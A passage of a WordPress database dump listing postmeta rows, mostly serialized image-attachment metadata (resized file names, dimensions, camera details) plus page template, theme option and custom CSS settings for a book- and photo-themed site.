\"book-slider-AmazonUS-1-550x1080.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:34:\"book-slider-AmazonUS-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:34:\"book-slider-AmazonUS-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"book-slider-AmazonUS-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:34:\"book-slider-AmazonUS-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:34:\"book-slider-AmazonUS-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"book-slider-AmazonUS-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:13:\"Sara Chadwick\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(14042,5380,'_wp_attached_file','2020/04/book-slider-Apple.jpg'),(14043,5380,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:4:\"file\";s:29:\"2020/04/book-slider-Apple.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"book-slider-Apple-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"book-slider-Apple-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"book-slider-Apple-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"book-slider-Apple-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"book-slider-Apple-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"book-slider-Apple-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"book-slider-Apple-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"book-slider-Apple-1080x550.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"book-slider-Apple-550x1080.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"book-slider-Apple-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"book-slider-Apple-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"book-slider-Apple-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:29:\"book-slider-Apple-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"book-slider-Apple-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"book-slider-Apple-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:13:\"Sara Chadwick\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(14044,5382,'_wp_attached_file','2020/04/book-slider-pic4-1.jpg'),(14045,5382,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2160;s:6:\"height\";i:2160;s:4:\"file\";s:30:\"2020/04/book-slider-pic4-1.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"book-slider-pic4-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"book-slider-pic4-1-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"book-slider-pic4-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"book-slider-pic4-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"book-slider-pic4-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"book-slider-pic4-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"book-slider-pic4-1-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:32:\"book-slider-pic4-1-2048x2048.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"book-slider-pic4-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:31:\"book-slider-pic4-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"book-slider-pic4-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:32:\"book-slider-pic4-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"book-slider-pic4-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"book-slider-pic4-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"book-slider-pic4-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:30:\"book-slider-pic4-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"book-slider-pic4-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"book-slider-pic4-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(14046,5378,'_wp_old_slug','book-slider-amazonuk-2'),(14047,5378,'_edit_lock','1588034617:1'),(14048,5378,'portfolio_single_masonry_image_size',''),(14049,5378,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(14050,5378,'_edit_last','1'),(14051,5378,'_wp_page_template','default'),(14197,5425,'_oembed_b2e910c3bdbb9dff46cde06e7c4b7532','{{unknown}}'),(14074,5391,'_wp_attached_file','2020/04/blownie1-sfw.jpg'),(14075,5391,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:24:\"2020/04/blownie1-sfw.jpg\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"blownie1-sfw-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"blownie1-sfw-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"blownie1-sfw-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"blownie1-sfw-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:24:\"blownie1-sfw-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:24:\"blownie1-sfw-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:24:\"blownie1-sfw-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:25:\"blownie1-sfw-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:24:\"blownie1-sfw-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:25:\"blownie1-sfw-1100x800.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"blownie1-sfw-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"blownie1-sfw-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"blownie1-sfw-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"blownie1-sfw-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"blownie1-sfw-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"blownie1-sfw-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1398609928\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(14078,4759,'_thumbnail_id','5391'),(14084,5392,'_wp_attached_file','2020/04/MG_0781-2-scaled.jpg'),(14085,5392,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:2560;s:4:\"file\";s:28:\"2020/04/MG_0781-2-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"MG_0781-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"MG_0781-2-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"MG_0781-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"MG_0781-2-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"MG_0781-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"MG_0781-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:23:\"MG_0781-2-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:23:\"MG_0781-2-2048x2048.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"MG_0781-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:22:\"MG_0781-2-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"MG_0781-2-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:23:\"MG_0781-2-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"MG_0781-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"MG_0781-2-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"MG_0781-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"MG_0781-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"MG_0781-2-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"MG_0781-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1483775829\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:9:\"0.0003125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:13:\"MG_0781-2.jpg\";}'),(14086,5393,'_wp_attached_file','2020/04/MG_0777-scaled.jpg'),(14087,5393,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:2560;s:4:\"file\";s:26:\"2020/04/MG_0777-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"MG_0777-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"MG_0777-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"MG_0777-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"MG_0777-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:19:\"MG_0777-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:19:\"MG_0777-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:21:\"MG_0777-1024x1536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:21:\"MG_0777-1365x2048.jpg\";s:5:\"width\";i:1365;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:19:\"MG_0777-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"MG_0777-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"MG_0777-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:21:\"MG_0777-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"MG_0777-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:19:\"MG_0777-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"MG_0777-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"MG_0777-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"MG_0777-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"MG_0777-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1483775823\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:9:\"0.0003125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:11:\"MG_0777.jpg\";}'),(14090,4741,'_thumbnail_id','5392'),(14189,5425,'_wp_attachment_context','site-icon'),(14190,5425,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:32:\"2018/01/cropped-Logo-1000-x-.png\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"cropped-Logo-1000-x--300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"cropped-Logo-1000-x--150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:32:\"cropped-Logo-1000-x--512x300.png\";s:5:\"width\";i:512;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:32:\"cropped-Logo-1000-x--300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"cropped-Logo-1000-x--300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"cropped-Logo-1000-x--100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:32:\"cropped-Logo-1000-x--300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"cropped-Logo-1000-x--100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-270\";a:4:{s:4:\"file\";s:32:\"cropped-Logo-1000-x--270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-192\";a:4:{s:4:\"file\";s:32:\"cropped-Logo-1000-x--192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-180\";a:4:{s:4:\"file\";s:32:\"cropped-Logo-1000-x--180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"site_icon-32\";a:4:{s:4:\"file\";s:30:\"cropped-Logo-1000-x--32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(14188,5425,'_wp_attached_file','2018/01/cropped-Logo-1000-x-.png'),(14130,5410,'_edit_lock','1588140057:1'),(14131,5410,'_edit_last','1'),(14132,5410,'_wp_page_template','default'),(14135,5410,'slide_template','default'),(14136,5410,'rs_page_bg_color','#ffffff'),(14137,5410,'_wpb_vc_js_status','true'),(14138,5411,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(14139,5410,'qodef_page_content_behind_header_meta','no'),(14140,5410,'qodef_boxed_background_image_attachment_meta','fixed'),(14141,5410,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14142,5410,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14143,5410,'qodef_video_type_meta','social_networks'),(14144,5410,'qodef_audio_type_meta','social_networks'),(14145,5410,'qodef_post_skin','qodef-post-light-skin'),(14146,5410,'qodef_disable_vertical_header_background_image_meta','no'),(14147,5410,'qodef_disable_header_widget_logo_area_meta','no'),(14148,5410,'qodef_disable_header_widget_menu_area_meta','no'),(14149,5410,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(14150,5410,'_thumbnail_id','5393'),(14155,5412,'_edit_lock','1692698271:1'),(14156,5412,'_edit_last','1'),(14157,5412,'_wp_page_template','default'),(14158,5412,'slide_template','default'),(14159,5412,'rs_page_bg_color','#ffffff'),(14160,5412,'_wpb_vc_js_status','true'),(14161,5413,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px 